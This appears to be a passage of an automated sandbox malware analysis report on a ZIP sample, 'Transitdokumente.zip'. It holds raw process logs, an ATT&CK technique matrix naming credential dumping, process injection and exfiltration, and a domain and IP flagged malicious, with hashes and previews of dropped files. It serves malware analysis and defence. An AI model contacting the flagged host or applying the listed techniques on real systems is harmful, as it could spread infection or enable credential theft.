Source: C:\Windows\hh.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\hh.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\hh.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\hh.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\hh.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\hh.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Command and Scripting Interpreter
1
LSASS Driver
11
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Exploitation for Client Execution
1
DLL Side-Loading
1
LSASS Driver
31
Virtualization/Sandbox Evasion
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
PowerShell
Logon Script (Windows)1
DLL Side-Loading
11
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information
NTDS1
Remote System Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
File and Directory Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
stradlingcollection.org0%VirustotalBrowse
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
stradlingcollection.org
62.182.20.50
truetrueunknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
62.182.20.50
stradlingcollection.orgUnited Kingdom
200083SUB6GBtrue
IP
192.168.2.1
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:705402
Start date and time:2022-09-19 11:33:19 +02:00
Joe Sandbox Product:CloudBasic
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Transitdokumente.zip
Cookbook file name:defaultwindowsinteractivecookbook.jbs
Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of analysed new started processes analysed:15
Number of new started drivers analysed:3
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
Analysis Mode:stream
Analysis stop reason:Timeout
Detection:MAL
Classification:mal52.expl.winZIP@4/6@1/20
Cookbook Comments:
  • Found application associated with file extension: .zip
  • Exclude process from analysis (whitelisted): vhdmp.sys, dllhost.exe, rundll32.exe, fsdepends.sys, svchost.exe
  • Excluded IPs from analysis (whitelisted): 40.126.31.73, 20.190.159.0, 20.190.159.4, 40.126.31.67, 20.190.159.71, 20.190.159.64, 20.190.159.2, 40.126.31.69
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, prda.aadg.msidentity.com, login.live.com, ctldl.windowsupdate.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1940658735648508
Encrypted:false
SSDEEP:
MD5:ED0FF51DEEE7DB96EC9C5624C12E0A04
SHA1:515B7FC63DB9F9313A6AEE6B4A6266B0FB6FF3A7
SHA-256:B93B1F8411ACBB11CBECF0F4E344D7D6D3551801BD891B816FB4720E60CE357B
SHA-512:FD82F7D0B1B6F1641D2FF3F4EC6FEF66E2AB0F2048D7A5BBC674C379DD429516198FFD6E6E445C6EC1A2763ADAACF6288026B4A90697D86C8EED743A71F177ED
Malicious:false
Reputation:low
Preview:@...e.................................F..............@..........
Process:C:\Windows\hh.exe
File Type:data
Category:dropped
Size (bytes):8276
Entropy (8bit):0.6274991512679713
Encrypted:false
SSDEEP:
MD5:943D3CE711A5EBA4A01A9B4E8EDF1388
SHA1:E8DFD5502B1413F4996CA43E2E76E45F2A32A1D7
SHA-256:BBB45CCB31607F92D62EE94204B0E2E4CA802EA6AE6A7B8B6AEBFE99655FA920
SHA-512:C969D0EF61FFAC73436EC7F094F9C737AD0F26D05EAA8AA506A919F31ACF22E237CBB088F7291C1883C8BF3ABE764F9895F921B4B37EE87A0353F8E4229E68E3
Malicious:false
Reputation:low
Preview:ITSP....T........ ..................................j..].!......."..T...............PMGL?................/....::DataSpace/NameList..4<(::DataSpace/Storage/MSCompressed/Content...,::DataSpace/Storage/MSCompressed/ControlData....)::DataSpace/Storage/MSCompressed/SpanInfo..../::DataSpace/Storage/MSCompressed/Transform/List..p&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/...i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:low
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\hh.exe
File Type:MS Windows HtmlHelp Data
Category:dropped
Size (bytes):8590
Entropy (8bit):0.7904569372886591
Encrypted:false
SSDEEP:
MD5:CCAAB566D98E76291A8438FD9EA9071C
SHA1:0BF1447CA88EF8AAEAAED44C8DC0D9712F5D6BD0
SHA-256:ADADA29DE7372EE7AE42E11951670E60C6D09C4EE480AEF7EA85A0422D576A2F
SHA-512:C64C242592F8C7F04A2D19122BE12C704AB3AE98F58988EFBD3DBBB9658931C048AD3C4C5251E87918C6FCE45FDEEB1B2435B64E99310DF78C3B6389690DA2BC
Malicious:false
Reputation:low
Preview:ITSF....`.......<}.........|.{.......".....|.{......."..`.......(.......:.......T .......................!......................,...................j..].!......."..T.....................U.n.c.o.m.p.r.e.s.s.e.d.....M.S.C.o.m.p.r.e.s.s.e.d...{.7.F.C.2.8.9.4.0.-.9.D.3.1.-.1.1.D.0.............LZXC....................ITSP....T........ ..................................j..].!......."..T...............PMGL?................/....::DataSpace/NameList..4<(::DataSpace/Storage/MSCompressed/Content...,::DataSpace/Storage/MSCompressed/ControlData....)::DataSpace/Storage/MSCompressed/SpanInfo..../::DataSpace/Storage/MSCompressed/Transform/List..p&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/...i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable............................................................................................................................................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6223
Entropy (8bit):3.7379825319277162
Encrypted:false
SSDEEP:
MD5:C85BAA416A20730F016B51FEACA21F6E
SHA1:9AA7724C10CBA1D6C6FBF6E1A6021FDC744BCD58
SHA-256:080BB6CB1C0611701256A051942C2F0E6E6CF30AB04069FD0423C01C329D16DF
SHA-512:982ACE77CE3DA378EA66C205B22F8880B96B68988E8EFB216009116899456232E192867B4A118CCF49E6875159228BE6F89B8574C7A48EB1A52727B8CA532F61
Malicious:false
Reputation:low
Preview:...................................FL..................F.".. ...#..]x\..W.J......5]&..............................:..DG..Yr?.D..U..k0.&...&.......4.]x\......v...D...........t...CFSF..1......RDy..AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......RDy3U0L..........................w.i.A.p.p.D.a.t.a...B.V.1......R.y..Roaming.@.......RDy3U0L..............................R.o.a.m.i.n.g.....\.1.....3U@L..MICROS~1..D.......RDy3U@L.............................M.i.c.r.o.s.o.f.t.....V.1......U.m..Windows.@.......RDy3U0L..........................(.&.W.i.n.d.o.w.s.......1......RFy..STARTM~1..n.......RDy3U0L....................D.....l<..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......RFy..Programs..j.......RDy3U0L....................@.....:...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1.....sN.&..WINDOW~1..V.......RDy.Uqk..........................}...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2.....sN2& .WINDOW~3.LNK..^.......RDy3UBL................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6223
Entropy (8bit):3.7379825319277162
Encrypted:false
SSDEEP:
MD5:C85BAA416A20730F016B51FEACA21F6E
SHA1:9AA7724C10CBA1D6C6FBF6E1A6021FDC744BCD58
SHA-256:080BB6CB1C0611701256A051942C2F0E6E6CF30AB04069FD0423C01C329D16DF
SHA-512:982ACE77CE3DA378EA66C205B22F8880B96B68988E8EFB216009116899456232E192867B4A118CCF49E6875159228BE6F89B8574C7A48EB1A52727B8CA532F61
Malicious:false
Reputation:low
Preview:...................................FL..................F.".. ...#..]x\..W.J......5]&..............................:..DG..Yr?.D..U..k0.&...&.......4.]x\......v...D...........t...CFSF..1......RDy..AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......RDy3U0L..........................w.i.A.p.p.D.a.t.a...B.V.1......R.y..Roaming.@.......RDy3U0L..............................R.o.a.m.i.n.g.....\.1.....3U@L..MICROS~1..D.......RDy3U@L.............................M.i.c.r.o.s.o.f.t.....V.1......U.m..Windows.@.......RDy3U0L..........................(.&.W.i.n.d.o.w.s.......1......RFy..STARTM~1..n.......RDy3U0L....................D.....l<..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......RFy..Programs..j.......RDy3U0L....................@.....:...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1.....sN.&..WINDOW~1..V.......RDy.Uqk..........................}...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2.....sN2& .WINDOW~3.LNK..^.......RDy3UBL................
File type:Zip archive data, at least v2.0 to extract
Entropy (8bit):7.983106851844272
TrID:
  • ZIP compressed archive (8000/1) 100.00%
File name:Transitdokumente.zip
File size:14859
MD5:23272bbcd8f183e8c03873fb0f9c6e56
SHA1:c52f6ba4fe98bf99927d3595071f95348ae9a485
SHA256:c220a262fc0c5c7835debdf7c17303020af2db45487663ffdd6d6e52e729e32a
SHA512:a9c233c70f1e4ca75d70242013c8968639f88131b6e97927bf465f84b06e4c4fae8c2c2d865f9d18279b2b18544e1960603fc92d00ecbf3316028bb39ff632f5
SSDEEP:384:22V7WR3cH8QdXnY5yKV0Oho4DLqJJNi+wxhauK3ea:2yKR3cH8qnY5TyO2JYdhW
TLSH:1C62D0FB4E11F288E3480AB89309992C515B7D0E58FFF48B193B689700E9A8067D6D89
File Content Preview:PK.........:3U.>..........(...Transitdokumente/attachments/F.Lillo.png..j.c.D.:1....4..K..+/.?e..b+..n%L..WS...........?j....&....-...P....l.?!....x........$D..:i.w&.[s..u...]....2...pZ..z{...)...k..N"e..a....T......2.S1...Q.e..>.....{y....2...:d....c ]..
Icon Hash:f4ccccccccccccdc